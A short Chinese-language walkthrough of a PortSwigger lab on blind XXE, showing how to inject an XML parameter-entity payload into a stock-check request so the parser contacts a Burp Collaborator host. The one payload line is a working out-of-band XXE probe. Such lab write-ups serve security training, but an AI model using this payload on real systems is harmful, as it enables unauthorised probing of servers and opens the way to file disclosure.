bp官方靶场xml外部实体（XXE）注入漏洞4

第四关 通过 XML 参数实体进行带外交互的盲 XXE漏洞

这一关就是通过 XML 参数实体进行带外交互，验证是否存在xxe漏洞

提示：1、靶场具有“检查库存”功能，可解析 XML 输入，但不显示任何意外值，并阻止包含常规外部实体的请求。

2、要解决该实验室问题，请使用参数实体使 XML 分析器向 Burp Collaborator 发出 DNS 查找和 HTTP 请求。

具体操作：

1、运行burp时，访问产品页面，单击“检查库存”

2、找到触发的库存检查的POST /product/stock数据包，发往repeater

3、在 XML 声明和 stockCheck 元素之间插入以下外部实体定义。右键单击并选择“插入协作者有效负载”以在指示的位置插入 Burp Collaborator 子域：

先从Burp Collaborator 的默认公共服务器，复制生成的子域名

qhb7eb8cbvbi8qbb62vd1v8t0k6bu7iw.oastify.com

插入外部实体加参数：

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://qhb7eb8cbvbi8qbb62vd1v8t0k6bu7iw.oastify.com"> %xxe; ]>

转到“协作者”选项卡，然后单击“Poll now”。如果您没有看到任何互动，请等待几秒钟，然后重试。您应该会看到应用程序因有效负载而启动的一些 DNS 和 HTTP 交互。

刷新浏览器，靶场过关